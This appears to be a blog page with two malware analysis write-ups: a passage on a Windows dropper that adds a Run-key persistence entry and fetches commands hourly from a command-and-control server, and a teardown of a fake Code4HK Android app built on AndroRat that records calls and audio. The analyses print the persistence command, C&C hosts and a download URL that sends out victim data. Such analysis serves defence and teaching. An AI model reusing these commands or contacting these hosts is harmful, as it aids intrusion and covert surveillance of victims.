1 of the paths (Path A) is taken when an -st argument is not supplied when executing the dropper while the other path (Path B) is taken when -st argument is supplied to the binary.
Path A is taken when the dropper is first executed by the user in which no arguments is passed in to the process. Path B is taken when the system boots up and execute the dropper via registry’s run in which an argument is provided to the process.

paths

Image 6 : 2 Paths of Malware

[ Analysis of Path A ]

At address 00403FAF we can see that a function @00403B55 is being called. This function forms the cmd.exe’s command and execute it as shown below.

command

Image 7 : Command Line to add Registry Entry

A registry entry is added via  reg add hkcu\software\microsoft\windows\currentversion\run /v hotkey /t reg_sz /d “C:\Documents and Settings\Administrator\Application Data\WMService.exe -st”

After execution, the dropper “deletes” itself by moving itself to C:\Documents and Settings\Administrator\Application Data\WMService.exe via c:\windows\system32\cmd.exe.

delete

Image 8 : Command Line to “Move” Malware to another location

[ Analysis of Path B ]

The first thing that Path B does was to create a Mutex object with the name “c8aabdc4” using CreateMutex function. In the event that the mutex already exists, the program will terminate.

mutex

 Image 9 : Creation of MutexName

The mutex is used to prevent 2 of such process running at the same time. The malware then continues to call function at address 0040264A where it gets the computer name and internal IP address of the computer.

Next GetTempPathA is called to form the path C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\s.bin which is used as the destination file path of the actual payload.

The function at address 00403D60 takes in the domain name www.sslquery.myz.info:443 and resolve it to an IP address – 113.10.245.133.

sslquery

 Image 10 : Possibly C&C of Malware

Function 00402350 is called to form the Get Request to the C&C server. In the function we can see that computer name and internal IP address as shown below.

data

 Image 11 : Data that are sent back to C&C

The appended information gotten from the victim  are encoded and appended to the URL.

URLDownloadToFileA is then called to upload user info and download the payload from the url below:

http://113.10.245.133:443/23qRBtcuhhT6RQlyu1UCPE7/Xr3zuUKejqj7jvbDS1lOxlTzc4W/3LaRfo+f6HiSg+RE1LQHP0Dd0tSVMT9KXTMmKh71dOj9vKvFS6Rn6+6Qf2jVjmNyHWn5BUV0QP+zEm9/XEXDd9RR0Tvnq2BpE66tKoZkUtDLuVT8X7BGjOa2Ct/VHNHXdTdWvYRYfnoXU0fCXtr7927GHEHho5uvxXgW149eEuExWXjslwtvniW0lF6maDcOmWbAcohjm/jLbHIa1RWR3hMY8y/+nmJXSrQ6D3wah9JHwORUvCUKK1X3Kt4w3AJBXJzC9qtD131K4P3R++cZdtdAewC+66LHA+3oBk9nIbTaGsD6prIZS1LrhRh3xB0ZJuds/bsxqJodiATKSWnASEvbMU2ZCs605p/3KorQsDgkdXEZOUzv8NEPyN/vLTTN3opci7d7N+sBtZXA3OqG+1tn+pBLIfggVDSZP/LJcOEYHfo+eLLweqc=.bin

to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\s.bin

However at the time of analyzing the sample, the server was already down…

download

 Image 12 : Download URL of another payload

should the actual payload (s.bin) exists we would expect that the first byte of the downloaded payload is the type of command to execute as shown in the switch statement below. The function responsible for reading the commands from the downloaded payload is at address 00402553.

switch

 Image 13 : List of Commands for Malware

Based on the above switch statements, we can observe that the payload downloaded is in fact commands to be executed on the machine. We do not really need to download and analyze the payload to know what it is doing. The functions that the malware can perform are reading files, upload file to server, executing commands, delete file, find file and retrieving logical drive info.

Once the command to the malware is executed, the instruction file, s.bin, is deleted.

As we can see in the image below, the malware would call back to its server every hourly and retrieve new commands to execute.

processloop

 Image 14 : Hourly Sleep

[ Dropping of Persistent Backdoor ]
Earlier on, we have mentioned that the malware added an entry to the registry. This registry key is added for persistence.
Location: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Name: Hotkey
Value: C:\Documents and Settings\Administrator\Application Data\WMService.exe -st

You may find a screen shot of this at [ Analysis of Path A ] section

[ Anti Analysis Features ]
The author of this malware implemented time delay in the program possibly for the purpose of evading anti virus detection. It is known that anti virus executes program to detect for malicious codes however it would only execute the program for a short period of time. A time delay approach could potentially evades such scanning.

Using breakpoint in OllyDbg, we observed that IsDebuggerPresent is used to detect if a debugger is attached to the dropper. However there is no difference in the core operations even if the dropper detects that a debugger is present.

[ Whois Investigation ]
A quick Whois query using CentralOps revealed that the domain name (www.sslquery.myz.info) is also pointing to the IP address (113.10.245.133) which
we have had also found it earlier in the binary. As myz.info is a “Free Dynamic DNS” service offered by ChangeIP.com, the infiltrator can change the IP address easily without affecting the callback.

However the server is currently inactive. (Information correct as of 22/10/2014)

[ Domain Whois record ]

Queried whois.afilias.info with “myz.info”…

Domain Name:MYZ.INFO
Domain ID: D1182102-LRMS
Creation Date: 2001-10-26T05:20:59Z
Updated Date: 2012-07-12T14:25:25Z
Registry Expiry Date: 2017-10-26T05:20:59Z
Sponsoring Registrar:Network Solutions, LLC (R122-LRMS)
Sponsoring Registrar IANA ID: 2
WHOIS Server:
Referral URL:
Domain Status: clientTransferProhibited
Registrant ID:52605919-NSI
Registrant Name:ChangeIP Network OperationsZZZ
Registrant Organization:
Registrant Street: 1200 Brickell Avenue
Registrant Street: Suite 1950
Registrant City:Miami
Registrant State/Province:FL
Registrant Postal Code:33131
Registrant Country:US
Registrant Phone:+1.8007913367
Registrant Phone Ext:
Registrant Fax: +1.7862246593
Registrant Fax Ext:
Registrant Email:noc@changeip.com
Admin ID:52605919-NSI
Admin Name:ChangeIP Network OperationsZZZ
Admin Organization:
Admin Street: 1200 Brickell Avenue
Admin Street: Suite 1950
Admin City:Miami
Admin State/Province:FL
Admin Postal Code:33131
Admin Country:US
Admin Phone:+1.8007913367
Admin Phone Ext:
Admin Fax: +1.7862246593
Admin Fax Ext:
Admin Email:noc@changeip.com
Billing ID:C1256251-LRMS
Billing Name:ChangeIP.com
Billing Organization:ChangeIP.com
Billing Street: 1200 Brickell Avenue
Billing Street: Suite 1950
Billing City:Miami
Billing State/Province:FL
Billing Postal Code:33131
Billing Country:US
Billing Phone:+1.8007913367
Billing Phone Ext:
Billing Fax:
Billing Fax Ext:
Billing Email:billing@changeip.com
Tech ID:52605919-NSI
Tech Name:ChangeIP Network OperationsZZZ
Tech Organization:
Tech Street: 1200 Brickell Avenue
Tech Street: Suite 1950
Tech City:Miami
Tech State/Province:FL
Tech Postal Code:33131
Tech Country:US
Tech Phone:+1.8007913367
Tech Phone Ext:
Tech Fax: +1.7862246593
Tech Fax Ext:
Tech Email:noc@changeip.com
Name Server:NS1.CHANGEIP.ORG
Name Server:NS2.CHANGEIP.ORG
Name Server:NS3.CHANGEIP.ORG
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC:Unsigned

inetnum: 113.10.245.0 – 113.10.245.255

netname: NWTBB-HK
descr: NWT Broadband Service
country: HK
admin-c: NC315-AP
tech-c: KW315-AP
status: ASSIGNED NON-PORTABLE
remarks: For network abuse email <abuse@newworldtel.com>
mnt-irt: IRT-NEWWORLDTEL-HK
changed: kmmwong@newworldtel.com 20101208
mnt-by: MAINT-HK-NEWWORLDTEL
source: APNIC

irt: IRT-NEWWORLDTEL-HK
address: 17/F Chevalier Commercial Centre,8 Wang Hoi Road, Kowloon Bay,Hong Kong.
e-mail: abuse@newworldtel.com
abuse-mailbox: abuse@newworldtel.com
admin-c: KW315-AP
tech-c: IDC1-AP
tech-c: NC315-AP
auth: # Filtered
mnt-by: MAINT-HK-NEWWORLDTEL
changed: abuse@newworldtel.com 20101207
source: APNIC

person: Kwong Ming Wong
nic-hdl: KW315-AP
e-mail: kmmwong@newworldtel.com
address: 17/F Chevalier Commercial Centre,8 Wang Hoi Road, Kowloon Bay,Hong Kong.
phone: +852-21300120
fax-no: + 852 – 2133 2175
country: HK
changed: kmmwong@newworldtel.com 20060814
mnt-by: MAINT-HK-NEWWORLDTEL
source: APNIC

person: Network Management Center
nic-hdl: NC315-AP
e-mail: nmc@newworldtel.com
address: 17/F Chevalier Commercial Centre,
address: 8 Wang Hoi Road, Kowloon Bay,
address: Hong Kong.
phone: + 852 – 2130-0120
fax-no: + 852 – 2133 2175
country: HK
changed: kmmwong@newworldtel.com 20080804
mnt-by: MAINT-HK-NEWWORLDTEL
source: APNIC

% Information related to ‘113.10.245.0/24AS17444’

route: 113.10.245.0/24
descr: NWT Route Object
origin: AS17444
mnt-by: MAINT-HK-NEWWORLDTEL
changed: kmmwong@newworldtel.com 20110114
source: APNIC

% This query was served by the APNIC Whois Service version 1.69.1-APNICv1r0 (WHOIS4)

 

Signing Off
D O & J Soo

[ Technical Tear Down: Fake Code4HK Mobile App ]

Today i’m going to talk about the Fake Code4HK Android application which the news reported here,http://www.scmp.com/news/hong-kong/article/1594667/fake-occupy-central-app-targets-activists-smartphones. The Code4HK guys had already long identified this Android mawlare this (https://code4hk.hackpad.com/Fake-Code4HK-Mobile-App-HQXXrylI6Wi) before the rest of the world did. However I probably should stop writing about Android malware but this one seems interesting for me to write though. 😛

As the thing happened almost 2weeks ago and the international activists only saw it yesterday. I was lucky to be able to grab a sample of this off Matthew Rudy Jacobs’s github. But i’ll be doing my own technical tear-down of this malware and hope to cover this comprehensively

[ Sample used in the analysis ]
MD5: 15e5143e1c843b4836d7b6d5424fb4a5
SHA1: c1e9ebd0b5ac7b6c50c69af219d163393d52df99

[ How it starts ]
It was first distributed via WhatsApp as shown in the image below.
code4hk.apk
As we can see, it’s asking participants of #OccupyCentral to download this url shortened link, http://is.gd/bh4adz
However, if you were to “Expand” this shortened URL, you will see the final url is, http://code4hk.vicp.cc/code4hk.apk
That link is not valid anymore and furthermore, that suspicious url does not belong to code4hk.
The official url for code4hk is http://www.code4.hk/

Since it’s an Android malware, let’s check the permissions of this malware and further dissect it. Now, use apktool and run the following command:

Now let’s take a look at the AndroidManifest.xml file, you should see the following and the permissions requested by the APK file.

There are interesting meta-data available to us like the following found in the cert.rsa file.

The email could be useful but there are no hits on google using that.
Another interesting but not confirmed “findings” i have is maerts spelled backwards is “stream so could ITSC mean CSTI? Council of Science and Technology Institute? I’m not sure but i’ll let everyone’s imagination run. 😀

But let’s take a look at com.v1.MainActivity first, manually converting the initial Dalvik code back to pseudo Java code.
After disassembling the .apk file with apktool and checking the Android manifest file, the first thing that i check is the MainActivity class.
We will get back something like the one shown below. Looking through the codes, we can see that it’s starting another class, StreamService.
analysis.code4hk.001

From my initial analysis, we can identify several things.
1.) It will open “qq.xml” from the Assets directory.
2.) It will create a new directory, “/sdcard/.qq/
3.) It read the contents of “qq.xml” and create a file, “/sdcard/.qq/temp.apk

If we had analysed the Android Manifest properly, “StreamService” will be started after reboot.
And if we were to analysed “StreamService” really carefully, it’s actually making use of AndroRat. 😛
If you had never seen AndroRat before, you can find a copy of it here. https://github.com/DesignativeDave/androrat
So basically, it’s getting lots of other stuff from the victims as well. o.0″

[ PhoneReceiver ]
Now let’s take a look at “PhoneReceiver” class and we can see that it will start recording all outgoing calls made by the victim(s).
o.0″ Sounds malicious to me.

If we were to check the following Android documentations,
setOutputFormat – http://developer.android.com/reference/android/media/MediaRecorder.OutputFormat.html
setAudioSource – http://developer.android.com/reference/android/media/MediaRecorder.AudioSource.html
setAudioEncoder – http://developer.android.com/reference/android/media/MediaRecorder.AudioEncoder.html
We know that the Output format is 3GPP media file format.
The source for the recording is using Microphone audio.
The encoding used is AMR (Narrowband) audio codec.

There are other interesting findings such as the naming convention of the filenames are
out_” appended with the outgoing phone number followed by “_” and resides in “/data/data/com.v1/.record/
The file extension of the files are “.amr” as shown below.
analysis.code4hk.003

[ StreamReceiver ]
One interesting thing is within the “StreamReceiver” class, it tried to read “getAll.dat” in a try..catch block and if it didn’t find it, it will activate the “features” of AndroRat”.
It will also try to read the contents of config.dat under “/assets/config.dat
This file actually contain an IP address, “61.36.11.75” & a number “1430” which we can safely assume that it’s the port number.

It also tried to use Baidu to gather location data of the victim(s) as shown below.
analysis.code4hk.004
The API could be found here: http://developer.baidu.com/map/loc_refer/com/baidu/location/LocationClient.html

Besides the IP address which we have highlighted earlier on, there are some other interesting IP address and domain name which are found within “StreamReceiver” class as shown below.
221.226.58.202
mm.v1lady.com:1430

One thing which most people may not know is that mm usually stands for “木马” or “妹妹” in China context.
I highly doubt it meant the latter. xDDD
木马” means trojan horse. 😛

It also creates of other interesting files storing all the information that it “steals” from the victim(s).
But i won’t go through each and everyone of them.

From the whois information, we can gather more information on v1lady.com as shown below:

From the whois information, we can gather more information on 221.226.58.202 as shown below:

[ FixTimeRecordReceiver ]
Now let’s take a look at “FixTimeRecordReceiver” class, we can see that the purpose of this is to record the audio using the MIC.
While it looks almost the same as “PhoneReceiver” but the recording starts in a fixed interval as it was set in “StreamService“.

There are other interesting findings such as the naming convention of the filenames are
FIX_TIME_” appended with “yyyyMMddHHmmss” (Date time of the system) and resides in “/data/data/com.v1/.record/
The file extension of the files are “.amr” as shown below.
analysis.code4hk.002

[ Conclusion ]
While this is not one of the state of the art Android Trojan, but it’s probably one of the interesting one that makes use of a known coding group in Hong Kong and spread through WhatsApp.
But there will always be questions, why are they being targeted, why send through WhatsApp and i think the number used could be those easily available “pre-paid” data sim card in Hong Kong.

I hope that this is fairly simple to understand technical tear down that people can repeat the steps on their own and learn how to analyse Android Malware.

Happy Reversing,
Jacob Soo